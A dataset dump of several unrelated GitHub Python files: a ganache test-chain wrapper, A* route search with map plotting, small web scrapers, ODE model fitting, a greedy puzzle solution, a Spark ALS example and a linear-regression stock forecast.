DEFAULT_GANACHE_PARAMETERS = []  # e.g. ["--dbMemdown"]


class Ganache:
    """Manage a local ganache test-chain subprocess."""

    def __init__(self, port, parameters, ganache_binary="ganache"):
        """
        :param port: TCP port the ganache RPC server should listen on
        :param parameters: extra command-line arguments for ganache
        :param ganache_binary: name or path of the ganache executable
        """
        # Copy so the caller's list is not mutated by the additions below.
        self.parameters = list(parameters)
        self.parameters.extend(["--port", str(port)])
        for param in DEFAULT_GANACHE_PARAMETERS:
            if param in self.parameters:
                continue
            self.parameters.append(param)
        self.ganache_binary = ganache_binary
        self.process = None  # type: Optional[Popen]

    def start(self):
        """Launch ganache and block until it reports it is listening.

        :raises ValueError: if the process has already been started
        :raises Exception: if ganache exits before it starts listening
        """
        if self.process is not None:
            # Bug fix: the original message claimed the process had
            # "already been terminated" when it had already been *started*.
            raise ValueError("Process has already been started")
        self.process = Popen(
            [self.ganache_binary] + self.parameters,
            stderr=PIPE, stdout=PIPE
        )
        while True:
            line = self.process.stdout.readline()
            if "Listening on" in str(line):
                break
            if self.process.poll() is not None:
                raise Exception("Could not create ganache network")

    def stop(self):
        """Terminate the ganache subprocess.

        :raises ValueError: if the process was never started or has
            already exited
        """
        if self.process is None:
            raise ValueError("Process has not yet been started")
        # poll() is None while the child is running; any return code
        # (including 0) means it already exited. The original truthiness
        # test missed a clean exit with return code 0.
        if self.process.poll() is not None:
            raise ValueError("Process has already terminated")
        self.process.terminate()
| JoranHonig/vertigo | eth_vertigo/core/network/ganache.py | ganache.py | py | 1,452 | python | en | code | 180 | github-code | 36 |
18795434468 | import networkx as nx
import matplotlib.pyplot as plt
import plotly.express as px
import webbrowser
import folium
from graph import *
from node import *
def isNodeValid(nodeName, graph):
    """Tell whether a node called `nodeName` exists in `graph`."""
    return any(node.name == nodeName for node in graph.nodeList)
def findNodeByName(nodeName, graph):
    """Return the first node in `graph` named `nodeName` (None if absent)."""
    matches = (node for node in graph.nodeList if node.name == nodeName)
    return next(matches, None)
def aStar(startName, goalName, graph):
    """A* search from `startName` to `goalName` over `graph`.

    Returns a Node whose `path` attribute holds the node sequence of the
    route found. h(n) is the haversine distance to the goal, g(n) the
    accumulated haversine distance travelled, and the frontier is expanded
    in ascending f(n) = g(n) + h(n) order.
    NOTE(review): the frontier is a plain list that is re-sorted after
    every expansion and popped from the front -- correct but costly.
    """
    start = findNodeByName(startName, graph)
    start.path = [start]
    goal = findNodeByName(goalName, graph)
    queue = []
    queue.append(start)
    while len(queue) > 0:
        # Expand the lowest-f(n) node (the queue is kept sorted below).
        current = queue.pop(0)
        if current == goal:
            return current
        listNewNode = []
        for neighbor in current.neighbors:
            # f(n) = g(n) (cost so far) + h(n) (straight-line estimate).
            hn = neighbor.calculateHaversine(goal)
            gn = current.gn + current.calculateHaversine(neighbor)
            fn = hn + gn
            # Wrap the neighbor in a fresh search node carrying its path.
            newNode = Node(current.name + " -> " + neighbor.name, neighbor.x, neighbor.y)
            newNode.path = current.path + [neighbor]
            newNode.setValue(gn, hn, fn)
            # Drop already-visited nodes so the search cannot cycle.
            newNode.neighbors = neighbor.removeNeighbor(newNode.path)
            listNewNode.append(newNode)
            # h(n) == 0 means this neighbor sits at the goal position.
            if hn == 0:
                return newNode
        # Merge the new frontier nodes and keep the queue ordered by f(n).
        queue = listNewNode + queue
        queue.sort(key=lambda x: x.fn)
def displayGraph(graph, result = Node()):
    """Draw `graph` with networkx/matplotlib; edges on `result.path` in red.

    NOTE(review): the `Node()` default argument is evaluated once at
    definition time (shared across calls) -- confirm Node() is stateless
    here before relying on it.
    """
    g = nx.Graph()
    for node in graph.nodeList:
        g.add_node(node.name)
        for neighbor in node.neighbors:
            # Highlight edges that belong to the found route in red.
            if neighbor in result.path and node in result.path:
                g.add_edge(node.name, neighbor.name, color='r', weight= round(node.calculateHaversine(neighbor), 2))
            else:
                g.add_edge(node.name, neighbor.name, color='black', weight= round(node.calculateHaversine(neighbor), 2))
    pos = nx.spring_layout(g)
    edges,colors = zip(*nx.get_edge_attributes(g, 'color').items())
    nx.draw(g, pos, edgelist=edges, edge_color=colors, with_labels = True, font_weight = 'bold')
    # Label each edge with its (rounded) haversine distance.
    edge_weight = nx.get_edge_attributes(g, 'weight')
    nx.draw_networkx_edge_labels(g, pos, edge_labels = edge_weight)
    plt.show()
def displayMap(graph, start, goal, result, name):
    """Render `graph` on a folium map saved as `name`.html and open it.

    Start/goal markers are red/green; edges on `result.path` are drawn red,
    all others blue, each popup showing the haversine distance.
    """
    startNode = graph.findNodeByName(start)
    goalNode = graph.findNodeByName(goal)  # NOTE(review): unused
    m = folium.Map(location=[startNode.x, startNode.y], zoom_start=50)
    for node in graph.nodeList:
        # Color-code the endpoints; ordinary nodes get the default marker.
        if node.name == start:
            folium.Marker([node.x, node.y], popup=node.name, icon=folium.Icon(color="red")).add_to(m)
        elif node.name == goal:
            folium.Marker([node.x, node.y], popup=node.name, icon=folium.Icon(color="green")).add_to(m)
        else:
            folium.Marker([node.x, node.y], popup=node.name).add_to(m)
        for neighbor in node.neighbors:
            distance = node.calculateHaversine(neighbor)
            # Route edges in red, everything else in blue.
            if neighbor in result.path and node in result.path:
                folium.PolyLine(locations=[[node.x, node.y], [neighbor.x, neighbor.y]], color="red", weight=2.5, opacity=1, popup= str(distance)).add_to(m)
            else:
                folium.PolyLine(locations=[[node.x, node.y], [neighbor.x, neighbor.y]], color="blue", weight=2.5, opacity=1, popup= str(distance)).add_to(m)
    name += ".html"
    m.save(name)
    webbrowser.open_new_tab(name)
| febryanarota/Tucil-3-IF2122 | src/aStar.py | aStar.py | py | 3,930 | python | en | code | 0 | github-code | 36 |
2252814008 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/01/22 10:18
# @Author : zc
# @File : get_htmlText.py
import requests
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.by import By
from PIL import Image
# 重定向爬虫h4
url = "http://www.itest.info/courses"
soup = BeautifulSoup(requests.get(url).text,'html.parser')
for courses in soup.find_all('p'):
print(courses.text)
print("\r")
# v2ex爬虫标题
url = "https://www.v2ex.com"
v2ex = BeautifulSoup(requests.get(url).text,'html.parser')
for span in v2ex.find_all('span',class_='item_hot_topic_title'):
print(span.find('a').text,span.find('a')['href'])
for title in v2ex.find_all("a",class_="topic-link"):
print(title.text,url+title["href"])
# 煎蛋爬虫图片
headers = {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'
}
def download_file(url):
    '''Stream-download `url` into the hard-coded img/ folder; return the path.'''
    print('Downding %s' %url)
    # Use the last URL segment as the local file name.
    local_filename = url.split('/')[-1]
    img_path = "/Users/zhangc/Desktop/GitTest/project_Buger_2/Python爬虫/img/" + local_filename
    print(local_filename)
    # stream=True avoids loading the whole image into memory at once.
    r = requests.get(url, stream=True, headers=headers)
    with open(img_path, 'wb') as f:
        for chunk in r.iter_content(chunk_size=1024):
            if chunk:
                f.write(chunk)
                f.flush()
    return img_path
url = 'http://jandan.net/drawings'
soup = BeautifulSoup(requests.get(url, headers=headers).text, 'html.parser')
def valid_img(src):
    '''Keep only jpg images hosted on sinaimg.cn.'''
    hosted_on_sina = '.sinaimg.cn' in src
    return src.endswith('jpg') and hosted_on_sina
for img in soup.find_all('img', src=valid_img):
src = img['src']
if not src.startswith('http'):
src = 'http:' + src
download_file(src)
# 知乎热门
headers ={
"user-agent":"user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
}
url = "https://www.zhihu.com/explore"
zhihu = BeautifulSoup(requests.get(url,headers=headers).text,"html.parser")
for title in zhihu.find_all('a',class_="ExploreSpecialCard-contentTitle"):
print(title.text)
# selenium爬虫
url = "https://www.zhihu.com/explore"
driver = webdriver.Chrome("/Users/zhangc/Desktop/GitTest/project_Buger_2/poium测试库/tools/chromedriver")
driver.get(url)
info = driver.find_element(By.CSS_SELECTOR,"div.ExploreHomePage-specials")
for title in info.find_elements(By.CSS_SELECTOR,"div.ExploreHomePage-specialCard > div.ExploreSpecialCard-contentList > div.ExploreSpecialCard-contentItem > a.ExploreSpecialCard-contentTitle"):
print(title.text,title.get_attribute('href')) | Owen-ET/project_Buger_2 | Python爬虫/get_htmlText.py | get_htmlText.py | py | 2,735 | python | en | code | 0 | github-code | 36 |
28295137025 | from mmsystem import Goldbeter_1995
from ssystem import SSystem
from sigmoidal import Sigmoidal
import matplotlib.pyplot as plt
import numpy as np
mm_model = Goldbeter_1995()
steps = 50
delta = 0.01
#states, velocities = mm_model.run(state=initial_state, velocity=initial_velocity, delta=0.1, steps=3)
#for i in range(states.shape[1]):
# plt.plot(states[:,i], label="MM X {}".format(i+1))
trainer = SSystem(n_vars=4)
trainer.g = np.array([[0, 0, -0.8, 0], [0.5, 0, 0, 0], [0, 0.75, 0, 0], [0.5, 0, 0, 0]])
trainer.h = np.array([[0.5, 0, 0, 0], [0, 0.75, 0, 0], [0, 0, 0.5, 0.2], [0, 0, 0, 0.8]])
trainer.alpha = np.array([12., 8., 3., 2.])
trainer.beta = np.array([10., 3., 5., 6.])
all_states = []
all_velocities = []
while len(all_states) < 1:
initial_state = np.random.random(4)
initial_velocity = np.random.random(4)
states, velocities = trainer.run(state=initial_state, velocity=initial_velocity, delta=delta, steps=steps)
if not np.any(np.isnan(states)) and not np.any(np.isnan(velocities)):
all_states.append(states)
all_velocities.append(velocities)
all_states = np.vstack(all_states)
all_velocities = np.vstack(all_velocities)
for i in range(states.shape[1]):
plt.plot(states[:,i], label="Trainer X {}".format(i+1))
#ssystem = SSystem(n_vars=4)
#ssystem.solve(all_states, all_velocities, iterations=1)
#states, velocities = ssystem.run(state=initial_state, velocity=initial_velocity, delta=delta, steps=steps)
#for i in range(states.shape[1]):
# plt.plot(states[:,i], label="S-Sys X {}".format(i+1))
nnsystem = Sigmoidal(n_vars=4)
nnsystem.solve(all_states, all_velocities)
states, velocities = nnsystem.run(state=initial_state, velocity=initial_velocity, delta=delta, steps=steps)
for i in range(states.shape[1]):
plt.plot(states[:,i], label="S-Sys X {}".format(i+1))
plt.legend()
plt.show()
| warut-vijit/modelsel | main.py | main.py | py | 1,856 | python | en | code | 0 | github-code | 36 |
74160088423 | #!/bin/python3
import sys
def toys(w, n):
    """Count containers needed when each holds toys within 4 weight units
    of its lightest toy (`n` is the toy count; unused beyond the signature)."""
    ordered = sorted(w)
    base = ordered[0]          # lightest toy opens the first container
    containers = 1
    for weight in ordered:
        if weight > base + 4:  # too heavy for this container: open a new one
            base = weight
            containers += 1
    return containers
if __name__ == "__main__":
n = int(input().strip())
w = list(map(int, input().strip().split(' ')))
result = toys(w, n)
print(result) | CodingProgrammer/HackerRank_Python | (Greedy)Priyanka_and_Toys.py | (Greedy)Priyanka_and_Toys.py | py | 411 | python | en | code | 0 | github-code | 36 |
70516415785 | import os
import os.path
import sys
from pyspark import SparkContext
from pyspark.mllib.recommendation import ALS
from numpy import array
if __name__ == "__main__":
data_file = '/spark/data/als.data'
if len(sys.argv) == 1:
print >> sys.stderr, "Usage: filtering.py <master>"
exit(-1)
else:
sc = SparkContext(sys.argv[1], "Collaborative Filtering")
data = sc.textFile(data_file)
ratings = data.map(lambda line: array([float(x) for x in line.split(',')]))
# Build the recommendation model using Alternating Least Squares
model = ALS.train(ratings, 1, 20)
# Evaluate the model on training data
testdata = ratings.map(lambda p: (int(p[0]), int(p[1])))
predictions = model.predictAll(testdata).map(lambda r: ((r[0], r[1]), r[2]))
ratesAndPreds = ratings.map(lambda r: ((r[0], r[1]), r[2])).join(predictions)
MSE = ratesAndPreds.map(lambda r: (r[1][0] - r[1][1])**2).reduce(lambda x, y: x + y)/ratesAndPreds.count()
print("Mean Squared Error = " + str(MSE))
| jhorey/ferry | ferry/data/dockerfiles/spark/filtering.py | filtering.py | py | 1,072 | python | en | code | 253 | github-code | 36 |
42579037186 | import math
import datetime
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib import style
from sklearn import preprocessing, model_selection, svm
from sklearn.linear_model import LinearRegression
style.use('ggplot')
#reading from excel converting into data frame
df=pd.read_excel("stock_data.xlsx")
df=df.set_index('Date')
#doing basic operation to get "high- low" percentage change
df = df[['Adj. Open', 'Adj. High', 'Adj. Low', 'Adj. Close', 'Adj. Volume']]
#df.set_index('Date', inplace=True)
df['HL_PCT'] = (df['Adj. High'] - df['Adj. Low']) / df['Adj. Close'] * 100.0
df['PCT_change'] = (df['Adj. Close'] - df['Adj. Open']) / df['Adj. Open'] * 100.0
df = df[['Adj. Close', 'HL_PCT', 'PCT_change', 'Adj. Volume']]
#defining the label
forecast_col = 'Adj. Close'
df.fillna(value=-99999, inplace=True)
forecast_out = int(math.ceil(0.01 * len(df)))
df['label'] = df[forecast_col].shift(-forecast_out)
#preprocessing of data before applying the algorithm
X = np.array(df.drop(['label'], 1))
X = preprocessing.scale(X)
X_lately = X[-forecast_out:]
X = X[:-forecast_out]
df.dropna(inplace=True)
y = np.array(df['label'])
#defining the trainin set and testing set from data.
# 80% is the traning set and 20% is the testing you can also modify this as per your requirement
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.2)
#so we are using linearRegression model
#using all the thread available for processing
clf = LinearRegression(n_jobs=-1)
clf.fit(X_train, y_train)
#this is the score for your algorithm
#you should always go with algorith with the highest score.
confidence = clf.score(X_test, y_test)
print(confidence)
#now using the algorith to predict values
forecast_set = clf.predict(X_lately)
df['Forecast'] = np.nan
#86400 is the number of seconds in one year
#df.set_index('Date', inplace=True)
last_date = df.iloc[-1].name
last_unix = last_date.timestamp()
one_day = 86400
next_unix = last_unix + one_day
for i in forecast_set:
next_date = datetime.datetime.fromtimestamp(next_unix)
next_unix += 86400
df.loc[next_date] = [np.nan for _ in range(len(df.columns)-1)]+[i]
#ploting the prediction on a graph
df['Adj. Close'].plot()
df['Forecast'].plot()
plt.legend(loc=4)
plt.xlabel('Date')
plt.ylabel('Price')
plt.show()
| rajdeep7dev/Prediction-of-stock-prices | ml_1.py | ml_1.py | py | 2,335 | python | en | code | 0 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.